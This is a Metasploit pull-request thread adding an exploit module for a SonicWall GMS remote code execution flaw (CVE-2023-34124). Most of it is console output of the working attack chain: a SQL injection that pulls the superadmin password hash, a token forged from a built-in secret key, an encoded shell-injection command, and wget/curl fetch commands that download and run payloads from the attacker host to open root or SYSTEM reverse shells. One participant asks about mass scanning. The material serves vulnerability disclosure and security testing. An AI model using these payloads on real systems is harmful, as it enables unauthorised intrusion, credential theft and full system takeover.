Sonicwall rce CVE-2023-34124

[rbowes-r7]

Add a module for a remote code execution issue in SonicWall GMS. This works by exploiting several different issues fixed in the same patch, culminating in shell injection. One of the biggest difficulties was getting past their XSS filter, which takes exception to a lot of special characters. Both the Windows and Linux versions should be able to encode/run any command that's not too long.

Verification

The affected software is SonicWall GMS 9.3.9320 (and likely earlier). The first patched version is 9.3.9330. They should be available in the "vulnerable software" folder, but need to be linked to a (free) SonicWall account + demo license. I documented how to get those going in the documentation/ entry.

This should work against both the Windows version (which is a .exe installer), and a Linux version (which is a VM appliance, which, AFAICT, they don't give you a login for, or at least not one I could find).

Once the software is installed:

1. Start msfconsole
2. Do use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124
3. Set the appropriate TARGET, RHOST, LHOST, and possibly FETCH_SRVHOST (for Windows)
4. Do run
5. You should get meterpreter

Happy to help with running the software or testing the modules!

[rbowes-r7]

Thanks for having a look, @jvoisin! I think I've addressed everything you suggested!

[eyes-of-ice]

have anyone came up with any checker/mas scanner for this ?
or can the exploit it self be used that way?

[cdelafuente-r7]

Thanks @rbowes-r7 for this great module! I left a few minor comments and suggestions before it lands. I tested version 9.3.9320 and it works great on both Linux and Windows. Thank you for helping me with the software installation.

[cdelafuente-r7]

I don't think regex is needed here. A simple character will avoid unnecessary regex processing.

Suggested change

	username, hash = hash.split(/:/, 2)
	username, hash = hash.split(':', 2)

[cdelafuente-r7]

It looks like payload.encoded is the default payload in generate_payload_exe.

metasploit-framework/lib/msf/core/exploit/exe.rb

Lines 65 to 66 in 28ba19a

	pl = opts[:code]
	pl ||= payload.encoded

Suggested change

	my_payload = generate_payload_exe(code: payload.encoded)
	my_payload = generate_payload_exe

[cdelafuente-r7]

I was surprised this works for both ELF and shell script, since execute_command_linux can receive an executable as raw binary or a shell script. If a shell script is received, the resulting temporary file created on the target will be a text file containing the command without shebang line. Since it is chmod'ed as executable, the parent shell seems to guess it is a shell script and execute it with /bin/sh. That's cool!

[rbowes-r7]

Yup! Super handy, thanks Linux!

I could maybe do "bash " to be safe, but /shrug

[cdelafuente-r7]

I'm wondering if there is any reason to disable the payload handler?
On my test environment (Linux VM Appliance with SonicWall GMS 9.3.9320), wget is available, which let me use a fetch payload:

msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.19 verbose=true fetch_srvhost=192.168.100.19 fetch_command=WGET

[*] Command to run on remote host: wget -qO ./QhmRCknzxk http://192.168.100.19:8080/aWXHuJn0-w7Npfyk2zEaeQ; chmod +x ./QhmRCknzxk; ./QhmRCknzxk &
[*] Fetch Handler listening on 192.168.100.19:8080
[*] HTTP server started
[*] Adding resource /aWXHuJn0-w7Npfyk2zEaeQ
[*] Started reverse TCP handler on 192.168.100.19:4444
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 92398446593864970646036091413420
[*] Generated client token: 611e94991eef3d3bb5e586070836a7a8
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.wlwfbnum\\\\nd2dldCAtc8gLi9RaG1S2tuenhrIGhdHA6Ly8xOIuMTY4LjEMTk6ODA4MC9hV1pFYWVROyBaG1vZCAreCAus7IC4vUWhtUkNbnpm\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.wlwfbnum\;rm\ /tmp/.wlwfbnum
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /aWXHuJn0-w7Npfyk2zEaeQ
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 7 opened (192.168.100.19:4444 -> 192.168.100.43:55231) at 2023-08-31 11:30:00 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > [*] Shutting down Meterpreter...

[eyes-of-ice]

Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.
what could be the reason for this?

[cdelafuente-r7]

There could be a lot of reasons for this. This can be an AV running on the target that blocks the payload execution, the software is patched and not vulnerable anymore, the payload simply needs some local tool to run properly (e.g. wget, curl, etc.), the handler is not running on the Metasploit side, a firewall is blocking somewhere, etc.

Please, can you give more details?

[eyes-of-ice]

Hi
thank you for answering
what detail is needed?
so i can give
i run the exploit
give it the lhost , rhost
it workes fine till the end that gives no session

[eyes-of-ice]

[] Command to run on remote host: wget -qO ./SfaBnzTq http://192.168.100.120:8080/_Ysce7IWY9BXUC2Go0wjXg; chmod +x ./SfaBnzTq; ./SfaBnzTq &
[] Fetch Handler listening on 192.168.100.120:8080
[] HTTP server started
[] Adding resource /_Ysce7IWY9BXUC2Go0wjXg
[] Started reverse TCP handler on 192.168.100.120:4444
[] Attempting to use SQL injection to grab the password hash for the superadmin user...
[] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:4e91d12e61259fed5d485f38e71da4be
[] Grabbing server hashing token...
[] Got the server-side token: 08178100102648407989985416008201
[] Generated client token: 5f33490baf0bed3a8c3061e3b879e334
[] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[] Encoding (Linux) payload
[] Encoded shell command: bash -c PLUS=$(echo\ -e\ begin-base64\ 755\ a\\nKwee\\n====\ |\ uudecode\ -o-);echo\ -e\ begin-base64\ 755\ /tmp/.lcsqpuat\\nd2dldCAtcU8gLi9TZmFCbnpUcSBodHRwOi8vMTkyLjE2OC4xMDAuMTIwOjgwODAvX1lzY2U3SVdZOUJYVUMyR28wd2pYZzsgY2htb2QgK3ggLi9TZmFCbnpUcTsgLi9TZmFCbnpUcSAm\\n====\ |\ uudecode\ ;\ coproc\ /tmp/.lcsqpuat\ ;\ rm\ /tmp/.lcsqpuat
[] Attempting to execute the shell injection payload
[+] Payload sent!
[*] Exploit completed, but no session was created.

[rbowes-r7]

Re: the original thing, I figured generic/command wouldn't necessarily want a handler. I don't feel strongly, though, so I went ahead and removed that

[cdelafuente-r7]

Thanks @rbowes-r7 ! Everything looks good to me now. I tested against version 9.3.9320 on Linux and Windows and verified I got a session. I'll go ahead and land it.

Example output

Linux

• target 0 (dropper)

msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.7 verbose=true

[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 87928145654401867812285498292269
[*] Generated client token: a4dbf3434867fd7de6218ffdc684a0e5
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.podezfld\\\\nf0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA\$\{PLUS\}gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoAQdRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp\$\{PLUS\}Wg8FSIXAeO3/5g\=\=\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.podezfld\;rm\ /tmp/.podezfld
[*] Attempting to execute the shell injection payload
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 1 opened (192.168.100.7:4444 -> 192.168.100.43:48965) at 2023-09-08 11:40:28 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

• target 2 (cmd) - fetch payload

msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set target 2
target => 2
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.43 lhost=192.168.100.7 verbose=true fetch_srvhost=192.168.100.7 fetch_command=WGET

[*] Command to run on remote host: wget -qO ./EoMFMgUZoX http://192.168.100.7:8080/MUbUZmtesJZBaBhmgETerw; chmod +x ./EoMFMgUZoX; ./EoMFMgUZoX &
[*] Fetch Handler listening on 192.168.100.7:8080
[*] HTTP server started
[*] Adding resource /MUbUZmtesJZBaBhmgETerw
[*] Started reverse TCP handler on 192.168.100.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 81832218319038994079518896558102
[*] Generated client token: 6b969cff849b8a6c60037ac9cbcbf076
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Linux detected!)
[*] Encoding (Linux) payload
[*] Encoded shell command: bash -c PLUS\=\$\(echo\ -e\ begin-base64\ 755\ a\\\\nKwee\\\\n\=\=\=\=\ \|\ uudecode\ -o-\)\;echo\ -e\ begin-base64\ 755\ /tmp/.nrqnacpl\\\\nd2dldCAtcU8gLi9Fb01GTWdVWm9YIGh0dHA6Ly8xOTIuMTY4LjEuNzo4MDgwL01VYlVabXRlc0paQmFCaG1nRVRlcnc7IGNobW9kICt4IC4vRW9NRk1nVVpvWDsgLi9Fb01GTWdVWm9YICY\=\\\\n\=\=\=\=\ \|\ uudecode\;coproc\ /tmp/.nrqnacpl\;rm\ /tmp/.nrqnacpl
[*] Attempting to execute the shell injection payload
[*] Client 192.168.100.43 requested /MUbUZmtesJZBaBhmgETerw
[*] Sending payload to 192.168.100.43 (Wget/1.21.3)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.100.43
[+] Payload sent!
[*] Meterpreter session 2 opened (192.168.100.7:4444 -> 192.168.100.43:48979) at 2023-09-08 11:42:18 +0200

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : gms.example.com
OS           :  (Linux 3.18.44-snwl-VMWare-x64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

Windows

• target 1 (command) - fetch payload

msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set target 1
target => 1
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > set payload payload/cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/sonicwall_shell_injection_cve_2023_34124) > exploit rhosts=192.168.100.234 lhost=192.168.100.1 verbose=true fetch_srvhost=192.168.100.1

[*] Command to run on remote host: curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg & start /B BoGmcbWnFkVL.exe
[*] Fetch Handler listening on 192.168.100.1:8080
[*] HTTP server started
[*] Adding resource /Qy-qOX10kZIXJGk3Q336Lg
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Validating SonicWall GMS is running on URI: /
[!] The service is running, but could not be validated. Running: SonicWall Universal Management Suite v9.3
[*] Attempting to use SQL injection to grab the password hash for the superadmin user...
[*] Generated SQL injection: ' union select (select ID from SGMSDB.DOMAINS limit 1), '', '', '', '', '', (select concat(id, ':', password) from sgmsdb.users where active = '1' order by issuperadmin desc limit 1 offset 0),'', '', '
[*] Generated a token using built-in secret key: /J50ZtvLJddOf5FI4nYdMJcX8IQ=
[*] Sending SQL injection request to get the username/hash...
[+] Found an account: admin:5f4dcc3b5aa765d61d8327deb882cf99
[*] Grabbing server hashing token...
[*] Got the server-side token: 00887156092946634253255096193522
[*] Generated client token: 530e7a3a16a3409c0642ae81d34c2325
[*] Attempting to authenticate with the client token + password hash...
[+] Successfully logged in as admin (Windows detected!)
[*] Encoding (Windows) command: curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg & start /B BoGmcbWnFkVL.exe
[*] Running shell command: cmd.exe /c curl -so BoGmcbWnFkVL.exe http://192.168.100.1:8080/Qy-qOX10kZIXJGk3Q336Lg "&" start /B BoGmcbWnFkVL.exe
[*] Client 192.168.100.234 requested /Qy-qOX10kZIXJGk3Q336Lg
[*] Sending payload to 192.168.100.234 (curl/7.83.1)
[*] Sending stage (200774 bytes) to 192.168.100.234
[+] Payload sent!
[*] Meterpreter session 3 opened (192.168.100.1:4444 -> 192.168.100.234:50548) at 2023-09-08 11:44:57 +0200

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows

[cdelafuente-r7]

Release Notes

This adds an exploit module that leverages a remote code execution in SonicWall GMS. Version 9.3.9320 (and likely earlier) is affected by this vulnerability identified as CVE-2023-34124.